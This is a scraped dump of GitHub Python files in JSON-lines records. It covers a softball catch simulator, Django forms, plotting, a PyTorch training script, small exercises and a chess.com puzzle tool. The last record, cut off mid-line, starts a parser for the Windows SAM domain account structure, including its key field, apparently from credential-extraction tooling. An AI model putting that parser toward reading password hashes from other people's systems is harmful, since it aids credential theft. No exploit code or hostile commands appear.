True\n intersections.append((fielder.name, positions))\n return out, intersections, flight_path\n\n @staticmethod\n def calculate_multiple(lineup: LineUp, balls_in_play: list[BallInPlay]) \\\n -> list[[bool, list[(str, CartesianCoordinate)], list[CartesianCoordinate]]]:\n return_value = []\n for ball in balls_in_play:\n return_value.append(CatchCalculator.calculate_out_lineup(lineup, ball.path))\n return return_value\n\n\nif __name__ == '__main__':\n ball_in_play = BallInPlay(10, 0, 0, 2)\n balls = []\n for height in range(3):\n balls.append(BallInPlay(10, 0, 0, height))\n # print(ball_in_play.path_3d())\n # fielder = Fielder(CartesianCoordinate(2, 0, 0))\n # print(fielder)\n # print(CatchCalculator.calculate_out_fielder(fielder, ball_in_play))\n fielders = []\n for distance in range(3):\n fielders.append(Fielder(CartesianCoordinate(distance, 0, 0), False))\n lineup = LineUp(fielders)\n # print(CatchCalculator.calculate_out_lineup(lineup, ball_in_play.path_3d()))\n calc_multiple_result = CatchCalculator.calculate_multiple(lineup, balls)\n caught = False\n for result in calc_multiple_result:\n if result[0]:\n caught = True\n break\n print(caught)\n print(calc_multiple_result)\n\n\n","repo_name":"codingaudrey/SoftBallStrategeSimulator","sub_path":"src/catch_calculator.py","file_name":"catch_calculator.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74271650409","text":"from django import forms\nfrom pedagogy.models import Cursus, StudyPeriod, Subject, SubjectModality\nfrom django.contrib.formtools.wizard import FormWizard\n\n\nclass CursusForm(forms.ModelForm):\n start_date = forms.DateField(\n widget=forms.DateInput(attrs={'class':'datepicker'})\n )\n \n class Meta:\n model = Cursus\n\nclass StudyPeriodForm(forms.ModelForm):\n start_date = forms.DateField(\n widget=forms.DateInput(attrs={'class':'datepicker'})\n )\n end_date = forms.DateField(\n widget=forms.DateInput(attrs={'class':'datepicker'})\n )\n class Meta:\n model = StudyPeriod\n\nclass SubjectForm(forms.ModelForm):\n name = forms.CharField()\n study_period = forms.ModelChoiceField(queryset=StudyPeriod.objects.all())\n\n def __init__(self, *args, **kwargs):\n \"\"\"Overwrite the default init method to add as many as needed subject\n modalities.\n\n \"\"\"\n super(SubjectForm, self).__init__(*args, **kwargs)\n for (modality_name, real_name) in SubjectModality.TYPE_CHOICES:\n self.fields[modality_name] = forms.CharField(required=False)\n\n def save(self, *args, **kwargs):\n \"\"\"Save the form and create the subject modality objects\n \n \"\"\"\n subject = super(SubjectForm, self).save(*args, **kwargs)\n for (modality, null) in SubjectModality.TYPE_CHOICES:\n if self.cleaned_data[modality] != '':\n sm = SubjectModality(\n planned_hours=self.cleaned_data[modality],\n subject = subject,\n type = modality\n )\n sm.save()\n return subject\n\n class Meta:\n model = Subject\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/pedagogy/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"25410279323","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport numpy as np\nimport math\nfrom matplotlib import ticker\n\nfig = plt.figure()\nax = plt.axes()\n\n#問題1の誤差分散行列\n# sigmap = np.array([[2.5,1.5],[1.5,2.5]])\n# sigmap_offset=(20.0,5.0)\n# sigmaf = np.array([[13.0/7.0,3.0/7.0],[3.0/7.0,5.0/7.0]])\n# sigmaf_offset=(26.0,15.0)\n# sigmas = np.array([[0.0,0.0],[0.0,1.0]])\n# sigmas_offset=(23.0,24.0)\n\n\n#問題2の誤差分散行列\nsigmap = np.array([[2.5,1.5],[1.5,2.5]])\nsigmap_offset=(20.0,5.0)\nsigmaf = np.array([[5.0/2.0,3.0/2.0],[3.0/2.0,5.0/2.0]])\nsigmaf_offset=(20.0,5.0)\n\n#固有値、固有ベクトルの計算\nsigmap_eigenval, sigmap_eigenvec = np.linalg.eig(sigmap)\nsigmap_rad = np.arctan2(sigmap_eigenvec[1][0], sigmap_eigenvec[0][0])\nsigmaf_eigenval, sigmaf_eigenvec = np.linalg.eig(sigmaf)\nsigmaf_rad = np.arctan2(sigmaf_eigenvec[1][0], sigmaf_eigenvec[0][0])\n# sigmas_eigenval, sigmas_eigenvec = np.linalg.eig(sigmas)\n# sigmas_rad = np.arctan2(sigmas_eigenvec[1][0], sigmas_eigenvec[0][0])\n\n#print(sigmaf_rad)\n# print(sigmap_eigenval)\n# print(sigmap_eigenvec)\n# print(sigmaf_eigenval)\n# print(sigmaf_eigenvec)\n\n#楕円の生成\n# sigmap_ell = patches.Ellipse(xy=sigmap_offset, width=2*sigmap_eigenval[0], height=2*sigmap_eigenval[1], angle=math.degrees(sigmap_rad), fc='b', ec='y', fill=False, label='sigma_p' )\n# sigmaf_ell = patches.Ellipse(xy=sigmaf_offset, width=2*sigmaf_eigenval[0], height=2*sigmaf_eigenval[1], angle=math.degrees(sigmaf_rad), fc='b', ec='b', fill=False, label='sigma_f')\n\nsigmap_ell = patches.Ellipse(xy=sigmap_offset, width=2*math.sqrt(sigmap_eigenval[0]), height=2*math.sqrt(sigmap_eigenval[1]), angle=math.degrees(sigmap_rad), fc='b', ec='y', fill=False, label='sigma_p' )\nsigmaf_ell = patches.Ellipse(xy=sigmaf_offset, width=2*math.sqrt(sigmaf_eigenval[0]), height=2*math.sqrt(sigmaf_eigenval[1]), angle=math.degrees(sigmaf_rad), fc='b', ec='b', fill=False, label='sigma_f')\n# sigmas_ell = patches.Ellipse(xy=sigmas_offset, width=1000.0, height=2.0, angle=0.0, fc='b', ec='g', fill=False, label='sigma_s')\n\nax.add_patch(sigmap_ell)\nax.add_patch(sigmaf_ell)\n# ax.add_patch(sigmas_ell)\n\nplt.axis('scaled')\nax.set_aspect('equal')\nax.grid(which='major', color='k', linestyle='--', linewidth=1)\n\n# ax.set_xlim(18, 28)\n# ax.set_ylim(0, 26)\nax.yaxis.set_major_locator(ticker.MultipleLocator(1.0)) # 1.0ごと\nplt.xlabel('x[cm]')\nplt.ylabel('y[cm]')\nplt.legend(loc='lower right')\nplt.show()\n\n\n","repo_name":"g104robo/error_ellipse","sub_path":"error_ellipse.py","file_name":"error_ellipse.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73689901288","text":"from __future__ import print_function, division\nimport os\nimport math\nimport glob\nimport shutil\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nfrom metrics import smape\nfrom model import Dual_efficientnet\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, models\nfrom torch import nn, optim\nfrom torchvision.transforms.functional import to_pil_image\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass StageDataset(Dataset):\n def __init__(self, excel_file, sheet_name, root_dir, data_info, transform=None):\n self.se_map_values = pd.read_excel(\n excel_file, sheet_name=sheet_name, \n ) # Load the SE map values from an Excel file nrows=181\n self.root_dir = root_dir\n self.records = pd.read_excel(\n data_info, sheet_name=sheet_name, \n ) # Load the records from an Excel file\n self.transform = transform\n self.image_slices = self.load_image_slices() # Load the image slices\n\n def get_numeric_prefix(self, filename):\n numeric_prefix = \"\"\n for char in filename:\n if char.isdigit():\n numeric_prefix += char\n else:\n break\n return int(numeric_prefix)\n\n def load_image_slices(self):\n image_slices = []\n for idx in range(len(self.se_map_values)):\n img_folder_name = str(idx).zfill(\n 4\n ) # Format the folder name with leading zeros\n img_folder = os.path.join(\n self.root_dir, img_folder_name\n ) # Get the path to the image folder\n print(\"Loading train images:\", img_folder)\n img_files = glob.glob(\n os.path.join(img_folder, \"*.jpg\")\n ) # Get the list of image files\n img_files_sorted = sorted(\n img_files,\n key=lambda x: int(\n os.path.splitext(os.path.basename(x))[0].split(\"_\")[0]\n ), # Sort the image files based on the numeric prefix in their names\n )\n\n images = []\n for i in range(0, len(img_files_sorted), len(img_files_sorted) // 128):\n img_file = img_files_sorted[i]\n image = Image.open(img_file)\n image = np.asarray(image) / 255.0\n image = np.transpose(image)\n image = image.astype(np.float32)\n images.append(image)\n image_slices.append(images)\n\n return image_slices\n\n def __len__(self):\n return len(self.se_map_values)\n\n def __getitem__(self, idx):\n image_slices = self.image_slices[idx]\n\n if self.transform:\n image_slices_pil = [\n to_pil_image(image_slice) for image_slice in image_slices\n ]\n image_slices_transformed = [\n self.transform(image_slice) for image_slice in image_slices_pil\n ]\n image_slices_transformed = torch.stack(image_slices_transformed).squeeze()\n else:\n image_slices_transformed = torch.tensor(image_slices)\n\n se_map_value = self.se_map_values.iloc[idx, 1:53].values.reshape(-1, 1)\n record = self.records.iloc[idx, 4:5].values\n\n if record[0] == \"normal\":\n record[0] = [0]\n elif record[0] == \"early\":\n record[0] = [1]\n elif record[0] == \"intermediate\":\n record[0] = [2]\n elif record[0] == \"advanced\":\n record[0] = [3]\n\n se_map_value = torch.from_numpy(se_map_value)\n record = torch.tensor(record[0])\n\n sample = {\n \"image\": image_slices_transformed,\n \"record\": record,\n \"se_map_value\": se_map_value,\n }\n return sample\n\n\nclass StageValDataset(Dataset):\n def __init__(self, excel_file, sheet_name, root_dir, data_info, transform=None):\n # total_rows = pd.read_excel(excel_file, sheet_name=sheet_name).shape[0]\n # skip_rows = total_rows - 10\n\n self.se_map_values = pd.read_excel(\n excel_file, sheet_name=sheet_name, skiprows=181\n ) # Load the SE map values from an Excel file, skipping the first 181 rows\n self.records = pd.read_excel(\n data_info, sheet_name=sheet_name, skiprows=181\n ) # Load the records from an Excel file, skipping the first 181 rows\n self.root_dir = root_dir\n self.transform = transform\n self.image_slices = self.load_image_slices() # Load the image slices\n\n def load_image_slices(self):\n image_slices = []\n for idx in range(181, 201): # Iterate over a specific range of indices\n img_folder_name = str(idx).zfill(\n 4\n ) # Format the folder name with leading zeros\n img_folder = os.path.join(\n self.root_dir, img_folder_name\n ) # Get the path to the image folder\n print(\"Loading val images:\", img_folder)\n img_files = glob.glob(\n os.path.join(img_folder, \"*.jpg\")\n ) # Get the list of image files\n img_files_sorted = sorted(\n img_files,\n key=lambda x: int(\n os.path.splitext(os.path.basename(x))[0].split(\"_\")[0]\n ), # Sort the image files based on the numeric prefix in their names\n )\n\n images = []\n for i in range(0, len(img_files_sorted), len(img_files_sorted) // 128):\n img_file = img_files_sorted[i]\n image = Image.open(img_file)\n image = np.asarray(image) / 255.0\n image = np.transpose(image)\n image = image.astype(np.float32)\n images.append(image)\n image_slices.append(images)\n\n return image_slices\n\n def __len__(self):\n return len(self.se_map_values)\n\n def __getitem__(self, idx):\n image_slices = self.image_slices[idx]\n\n if self.transform:\n image_slices_pil = [\n to_pil_image(image_slice) for image_slice in image_slices\n ]\n image_slices_transformed = [\n self.transform(image_slice) for image_slice in image_slices_pil\n ]\n image_slices_transformed = torch.stack(image_slices_transformed).squeeze()\n else:\n image_slices_transformed = torch.tensor(image_slices)\n\n se_map_value = self.se_map_values.iloc[idx, 1:53].values.reshape(-1, 1)\n se_map_value = torch.from_numpy(se_map_value)\n\n record = self.records.iloc[idx, 4:5].values\n\n if record[0] == \"normal\":\n record[0] = [0]\n elif record[0] == \"early\":\n record[0] = [1]\n elif record[0] == \"intermediate\":\n record[0] = [2]\n elif record[0] == \"advanced\":\n record[0] = [3]\n record = torch.tensor(record[0])\n\n sample = {\n \"image\": image_slices_transformed,\n \"record\": record,\n \"se_map_value\": se_map_value,\n }\n\n return sample\n\n\n# Parsing command-line arguments\nparser = argparse.ArgumentParser(\n description=\"MICCAI2023 Challenge: STAGE, task 2 baseline training script\"\n)\nparser.add_argument(\n \"--excel-file\",\n type=str,\n required=True,\n help=\"Path to the Excel file with annotations\",\n)\nparser.add_argument(\n \"--sheet-name\",\n type=int,\n default=0,\n required=True,\n help=\"Name of the sheet containing the data\",\n)\nparser.add_argument(\n \"--root-dir\", type=str, required=True, help=\"Directory with all the images\"\n)\nparser.add_argument(\n \"--learning-rate\",\n type=float,\n default=0.0001,\n help=\"Learning rate for the optimizer\",\n)\nparser.add_argument(\n \"--num-epochs\", type=int, default=20, help=\"Number of epochs for training\"\n)\nparser.add_argument(\n \"--batch-size\", type=int, default=64, help=\"Batch size for training\"\n)\nparser.add_argument(\n \"--warmup-epochs\", type=int, default=40, help=\"Number of warm-up epochs\"\n)\nparser.add_argument(\n \"--min-lr\", type=float, default=0.00001, help=\"Minimum learning rate\"\n)\n\nargs = parser.parse_args()\n\n\ndef adjust_learning_rate(optimizer, epoch, args):\n \"\"\"Decay the learning rate based on the schedule\"\"\"\n if epoch < args.warmup_epochs:\n lr = args.learning_rate * epoch / args.warmup_epochs\n else:\n lr = args.min_lr + (args.learning_rate - args.min_lr) * 0.5 * (\n 1\n + math.cos(\n math.pi\n * (epoch - args.warmup_epochs)\n / (args.num_epochs - args.warmup_epochs)\n )\n )\n\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\n# Data transforms\ntransform = transforms.Compose(\n [\n # transforms.Resize((512, 512)),\n transforms.CenterCrop((512, 512)), # Add a central crop\n # transforms.RandomGrayscale(p=0.2),\n transforms.RandomHorizontalFlip(),\n # transforms.RandomVerticalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize(mean=[0.5], std=[0.5])\n ]\n)\n\n# Set device\ndevice = torch.device(\"cuda:7\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass CustomMSELoss(nn.Module):\n def __init__(self):\n super(CustomMSELoss, self).__init__()\n\n def forward(self, prediction, label):\n mask = torch.ones_like(label)\n mask[label == 0] = 5\n loss = torch.mean(mask * (prediction - label) ** 2)\n return loss\n\n\nloss_func = CustomMSELoss()\n\n# loss_func = nn.MSELoss()\n\nloss_func_name = \"Mean squared error loss\"\n\n# Learning parameters\nlearn_rate = args.learning_rate\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\n\noptimizer_name = \"Adam\"\nstart_time = datetime.now()\n\nrun_id = \"checkpoint\"\nif os.path.exists(run_id):\n shutil.rmtree(run_id)\nos.mkdir(run_id)\n\nlog_dir = run_id + \"/logs\"\nwriter = SummaryWriter(log_dir=log_dir)\n\n# Write hyperparameters to a file\nwith open(run_id + \"/hyperparams.csv\", \"w\") as wfil:\n wfil.write(\"loss function, \" + loss_func_name + \"\\n\")\n wfil.write(\"learning rate (init), \" + str(learn_rate) + \"\\n\")\n wfil.write(\"number epochs, \" + str(num_epochs) + \"\\n\")\n wfil.write(\"batch size, \" + str(batch_size) + \"\\n\")\n wfil.write(\"optimizer, \" + optimizer_name + \"\\n\")\n wfil.write(\"start time, \" + str(start_time) + \"\\n\")\n\nNUM_CLASSES = 52\n\n# Create the Dual_network34 model\nmodel = Dual_efficientnet()\nprint(model)\n\n# Create the StageDataset for training\ntrain_set = StageDataset(\n excel_file=args.excel_file,\n sheet_name=args.sheet_name,\n root_dir=args.root_dir,\n data_info=\"STAGE_training/data_info_training.xlsx\",\n transform=transform,\n)\n\n# Create the StageValDataset for validation\nvalid_set = StageValDataset(\n excel_file=args.excel_file,\n sheet_name=args.sheet_name,\n root_dir=args.root_dir,\n data_info=\"STAGE_training/data_info_training.xlsx\",\n transform=transform,\n)\n\n# Create data loaders\ntrainloader = DataLoader(\n dataset=train_set, batch_size=batch_size, shuffle=False, num_workers=16\n)\nvalidloader = DataLoader(\n dataset=valid_set, batch_size=batch_size, shuffle=False, num_workers=16\n)\n\n# Freeze the first three layers of the model\nct = 0\nfor child in model.children():\n ct += 1\n if ct < 4:\n for param in child.parameters():\n param.require_grad = False\n\nmodel.to(device)\n\n# Optimizer and learning rate scheduler\noptimizer = optim.Adam(model.parameters(), lr=learn_rate)\nscheduler = ReduceLROnPlateau(\n optimizer, mode=\"min\", factor=0.75, patience=3, verbose=True\n)\n\nbest_valid_loss = \"unset\"\nbest_train_smape = float(\"inf\")\n\n# Log file for training progress\nwith open(run_id + \"/log_file.csv\", \"w\") as log_fil:\n log_fil.write(\"epoch,epoch duration,train loss,valid loss\\n\")\n\n # Training loop\n for epoch in range(num_epochs):\n epoch_start = datetime.now()\n epoch_train_loss = 0.0\n epoch_valid_loss = 0.0\n epoch_train_smape = 0.0\n\n # Training\n model.train()\n for i, sample in tqdm(enumerate(trainloader), total=len(trainloader)):\n images = sample[\"image\"]\n records = sample[\"record\"]\n labels = sample[\"se_map_value\"]\n\n images = images.to(device)\n records = records.to(device)\n labels = labels.to(device)\n\n optimizer.zero_grad()\n\n outputs = model(images, records)\n train_labels = torch.squeeze(labels)\n loss = loss_func(outputs, train_labels.float())\n smape_score = smape(\n train_labels.detach().cpu().numpy(), outputs.detach().cpu().numpy()\n )\n\n loss.backward()\n optimizer.step()\n\n epoch_train_loss = epoch_train_loss + loss.item()\n epoch_train_smape += smape_score\n\n iteration = epoch * len(trainloader) + i\n writer.add_scalar(\"Train Loss\", loss.item(), iteration)\n writer.add_scalar(\n \"Train SMAPE\", epoch_train_smape / len(trainloader), epoch\n )\n\n # Validation\n model.eval()\n output_values = []\n with torch.no_grad():\n for i, sample in tqdm(enumerate(validloader), total=len(validloader)):\n images = sample[\"image\"]\n records = sample[\"record\"]\n labels = sample[\"se_map_value\"]\n images = images.to(device)\n records = records.to(device)\n labels = labels.to(device)\n valid_labels = torch.squeeze(labels)\n outputs = model(images, records)\n loss = loss_func(outputs, valid_labels.float())\n epoch_valid_loss = epoch_valid_loss + loss.item()\n output_values.extend(outputs.cpu().tolist())\n\n # Calculate SMAPE\n y_true = valid_labels.cpu().numpy()\n y_pred = np.array(outputs.cpu())\n smape_score = smape(y_true, y_pred)\n print(\"Valid SMAPE:\", smape_score)\n\n # Create a DataFrame from the output values\n df = pd.DataFrame(output_values)\n # Save the DataFrame to a CSV file\n df.to_csv(\"output_val.csv\", index=False)\n\n adjust_learning_rate(optimizer, epoch, args)\n\n scheduler.step(epoch_valid_loss)\n\n writer.add_scalar(\n \"Validation Loss\", epoch_valid_loss / (NUM_CLASSES * batch_size), epoch\n )\n\n epoch_end = datetime.now()\n epoch_time = (epoch_end - epoch_start).total_seconds()\n\n # if best_valid_loss == \"unset\" or epoch_valid_loss < best_valid_loss:\n # best_valid_loss = epoch_valid_loss\n # print(\"Save best model!\")\n # torch.save(model.state_dict(), run_id + \"/best_weights.pth\")\n\n # torch.save(model.state_dict(), run_id + \"/last_weights.pth\")\n\n if epoch_train_smape / len(trainloader) < best_train_smape:\n best_train_smape = epoch_train_smape / len(trainloader)\n print(\"Save best model!\")\n torch.save(model.state_dict(), run_id + \"/best_weights.pth\")\n\n torch.save(model.state_dict(), run_id + \"/last_weights.pth\")\n\n log_fil.write(\n str(epoch)\n + \",\"\n + str(epoch_time)\n + \",\"\n + str(epoch_train_loss / (NUM_CLASSES * batch_size))\n + \",\"\n + str(epoch_valid_loss / (NUM_CLASSES * batch_size))\n + \"\\n\"\n )\n\n print(\n \"epoch: \"\n + str(epoch)\n + \" - (\"\n + str(epoch_time)\n + \" seconds)\"\n + \"\\n\\ttrain loss: \"\n + str(epoch_train_loss / (NUM_CLASSES * batch_size) / len(train_set))\n + \"\\n\\tvalid loss: \"\n + str(epoch_valid_loss / (NUM_CLASSES * batch_size) / len(valid_set))\n )\n\nend_time = datetime.now()\nwith open(run_id + \"/hyperparams.csv\", \"a\") as wfil:\n wfil.write(\"end time,\" + str(end_time) + \"\\n\")\n","repo_name":"lixiang007666/STAGE_baseline2","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7633546092","text":"def B_S(A):\r\n \r\n Flag, n = True, len(A) - 1 #по сути - потенциальное количество перестановок одного значения\r\n while Flag: \r\n Flag = False #останется таким, как только итерация продёт без перестановок => сорт-ка будеьт завершена\r\n for i in range(n): \r\n if A[i] > A[i + 1]: \r\n A[i], A[i + 1] = A[i + 1], A[i] #пузырёк всплывает\r\n Flag = True \r\n n -= 1\r\n","repo_name":"polina031005/BubbleSort","sub_path":"сортировка пузырьком.py","file_name":"сортировка пузырьком.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10260882649","text":"import pandas as pd\nimport geopandas as gpd\nfrom tqdm import tqdm\nimport os\n\n\ndef main():\n \"\"\"\n After calling download_all_shapefiles, loop through the files and create a csv containing all the county and block information, and saving it to data/blocks.csv.xz\n \"\"\"\n dir = \"../data/shapefiles\"\n total_set = set()\n pbar = tqdm(os.listdir(dir))\n for f in pbar:\n pbar.set_description(\"Adding: %s\" % f)\n if not f.split(\".\")[-1] == \"zip\": # skip not zip files\n continue\n filepath = os.path.join(dir, f)\n df = gpd.read_file(filepath)\n total_set |= set(df[\"GEOID20\"])\n pbar.set_description(\"Total set length: %s\" % len(total_set))\n\n df = pd.DataFrame()\n df[\"GEOID20\"] = list(total_set)\n df = df.sort_values(by=\"GEOID20\")\n df.to_csv(\"../data/blocks.csv.xz\", index=False)\n return df\n\n\nif __name__ == \"__main__\":\n df = main()\n print(df)\n assert (\n len(df) == 8174955 # excluding island areas\n ) # tally from census tallies (https://www.census.gov/geographies/reference-files/time-series/geo/tallies.html)\n","repo_name":"uva-bi-sdad/national_address_database","sub_path":"code/retrieve_blocks.py","file_name":"retrieve_blocks.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9308697899","text":"# 6. Sum series\n# 1/1 + 2^2/2 + 3^3/3 + 4^4 / 4\n\nn=int(input(\"Enter first number: \" ))\n\n# For finding sum from 1/2 till 3^3/3\n# 1/1 + 2*2/2 + 3*3*3/3 => 1 + 2 + 9 => 12\n# n=4 \ntotal=0\nfor i in range(1, 4):\n a=float(i**i)/i\n total=total+a\nprint(total)","repo_name":"nupoor01nawathey/Python","sub_path":"Beginner/6SumSeries.py","file_name":"6SumSeries.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12222885258","text":"from django.shortcuts import render\r\nfrom cgitb import html\r\nfrom django.http import HttpResponse\r\n# Create your views here.\r\n\r\ndef bienvenida(request):\r\n saludo = {\r\n 'mensaje' : 'Bienvenido !'\r\n }\r\n return render(request, 'index.html', saludo)\r\n\r\ndef listado(request):\r\n\r\n dicc = {\r\n 'Gatos': [\r\n {'nombre': 'Figaro', 'raza' : 'persa', 'edad' : 4, 'genero' : 'macho', 'color' : 'blanco y negro', 'peso' : '4kl'},\r\n {'nombre': 'Luna', 'raza' : 'callejero', 'edad' : 4, 'genero' : 'hembra', 'color' : 'tricolor', 'peso' : '4kl'},\r\n {'nombre': 'Candy', 'raza' : 'persa', 'edad' : 4, 'genero' : 'hembra', 'color' : 'naranja', 'peso' : '4kl'},\r\n {'nombre': 'Tom', 'raza' : 'Callejero', 'edad' : 4, 'genero' : 'macho', 'color' : 'plomo', 'peso' : '4kl'},\r\n ]\r\n }\r\n return render(request, 'list.html', dicc)\r\n\r\n\r\ndef agregar(request):\r\n return render(\r\n request,\r\n 'wena.html'\r\n )","repo_name":"Joander03/Backend","sub_path":"veterinaria/gatos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70785682408","text":"import chess\nimport requests\nfrom io import StringIO\nfrom bs4 import BeautifulSoup\nimport chess.pgn\n# import chess.uci\nfrom chess.pgn import BaseVisitor\n\n\nclass ChessAPI:\n def __init__(self, username, password):\n self.session = requests.Session()\n self.session.post('http://www.chess.com/login_check',\n data={\n '_username': username,\n '_password': password,\n '_timezone': 'America/Chicago',\n '_target_path': 'https://www.chess.com/home'\n })\n\n def create_puzzle(self, board, moves):\n game = chess.pgn.Game()\n game.setup(board)\n game.end().add_line(moves)\n\n last_move = game.move\n flip = game.board().turn is False # is it black's turn\n exporter = chess.pgn.StringExporter(headers=True, variations=True, comments=False)\n pgn_string = game.accept(exporter)\n data = \"\"\"&-diagramtype:\nchessProblem\n&-colorscheme:\nbrown\n&-piecestyle:\n3dwood\n&-float:\nleft\n&-flip:\n%s\n&-prompt:\nfalse\n&-coords:\ntrue\n&-size:\n200\n&-lastmove:\n%s\n&-focusnode:\n&-beginnode:\n&-endnode:\n&-hideglobalbuttons:\nfalse\n&-pgnbody:\n%s\"\"\" % (str(flip).lower(), last_move, pgn_string)\n response = self.session.post(\"https://www.chess.com/tinymce/api/get_diagram?id=new\", data={'textSetup': data})\n return 'http://www.chess.com/emboard?id=%s' % int(response.content)\n\n def get_games(self, member_name):\n pass\n\n\nclass Puzzle:\n def __init__(self, board, moves):\n self.game = chess.pgn.Game()\n self.game.setup(board)\n self.game.end().add_line(moves)\n\n\nclass AnnotatedVisitor(BaseVisitor):\n def __init__(self, api):\n self.puzzles = []\n self.api = api\n self.last_board = None\n self.moves = []\n self.in_variation = False\n self.severity = 0\n\n def visit_move(self, board, move):\n if not self.in_variation:\n self.last_board = board\n self.moves = []\n else:\n self.moves.append(move)\n\n def begin_variation(self):\n self.in_variation = True\n\n def end_variation(self):\n self.in_variation = False\n self.puzzles.append((self.severity, self.api.create_puzzle(self.last_board, self.moves)))\n\n def visit_comment(self, comment):\n if 'inaccuracy' in comment.lower():\n self.severity = 1\n elif 'mistake' in comment.lower():\n self.severity = 2\n elif 'blunder' in comment.lower():\n self.severity = 4\n elif 'missed mate' in comment.lower():\n self.severity = 4\n\n\nclass AnalysisVisitor(BaseVisitor):\n def __init__(self, stockfish_path, max_time_per_move=1000, max_depth_per_move=20):\n self.info_handler = chess.uci.InfoHandler()\n self.engine = chess.uci.popen_engine(stockfish_path)\n self.engine.info_handlers.append(self.info_handler)\n self.engine.uci()\n self.engine.ucinewgame()\n self.max_time_per_move = max_time_per_move\n self.max_depth_per_move = max_depth_per_move\n self.puzzles = []\n\n def visit_move(self, board, move):\n self.engine.ucinewgame()\n self.engine.position(board)\n best_move, _ = self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n\n board.push(move)\n self.engine.ucinewgame()\n self.engine.position(board)\n self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n your_score = self.info_handler.info[\"score\"][1]\n board.pop()\n\n board.push(best_move)\n self.engine.ucinewgame()\n self.engine.position(board)\n self.engine.go(depth=self.max_depth_per_move, movetime=self.max_time_per_move / 3)\n ideal_score = self.info_handler.info[\"score\"][1]\n board.pop()\n\n create_puzzle = False\n use_all_moves = False\n if ideal_score.cp and your_score.cp:\n # No mates detected, just compare the scores\n absolute_difference = abs(ideal_score.cp - your_score.cp)\n if absolute_difference > 200:\n create_puzzle = True\n elif ideal_score.mate and ideal_score.mate > 0 and your_score.cp:\n # Ideal solution has a mate and yours doesn't - BLUNDER\n create_puzzle = True\n elif ideal_score.mate and your_score.mate:\n absolute_difference = ideal_score.mate - your_score.mate\n if absolute_difference > 1 and ideal_score.mate > 0:\n create_puzzle = True\n use_all_moves = True\n\n if create_puzzle:\n moves = [best_move] + self.info_handler.info['pv'][1]\n if not use_all_moves:\n moves = moves[:min(len(moves), 5)]\n else:\n moves = moves[:min(len(moves), 14)]\n self.puzzles.append(Puzzle(board, moves))\n\n","repo_name":"TomWerner/BlunderPuzzler","sub_path":"puzzler/ChessAPI.py","file_name":"ChessAPI.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20123942432","text":"#!/usr/bin/env python3\n#\n# Author:\n# Tamas Jos (@skelsec)\n#\n\nimport io\n\nclass DOMAIN_ACCOUNT_F:\n\tdef __init__(self):\n\t\tself.revision = None\n\t\tself.unk1 = None\n\t\tself.creation_time = None\n\t\tself.domain_modified_count = None\n\t\tself.max_pw_age = None\n\t\tself.min_pw_age = None\n\t\tself.force_logoff = None\n\t\tself.lockout_duration = None\n\t\tself.lockout_observation_window = None\n\t\tself.unk2 = None\n\t\tself.next_rid = None\n\t\tself.pw_properties = None\n\t\tself.min_pw_length = None\n\t\tself.pw_history_length = None\n\t\tself.lockout_treshold = None\n\t\tself.unk3 = None\n\t\tself.server_state = None\n\t\tself.server_role = None\n\t\tself.uas_compatibility_req = None\n\t\tself.unk4 = None\n\t\tself.key_0 = None\n\t\n\t@staticmethod\n\tdef from_bytes(data):\n\t\treturn DOMAIN_ACCOUNT_F.from_buffer(io.BytesIO(data))\n\n\t@staticmethod\n\tdef from_buffer(buff):\n\t\tdf = DOMAIN_ACCOUNT_F()\n\t\tdf.revision = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.creation_time = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.domain_modified_count = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.max_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.min_pw_age = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.force_logoff = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.lockout_duration = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.lockout_observation_window = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.unk2 = int.from_bytes(buff.read(8), 'little', signed = False)\n\t\tdf.next_rid = int.from_bytes(buff.read(4), 'little', signed = False)\n\t\tdf.pw_properties = int.from_bytes(buff.read(4), 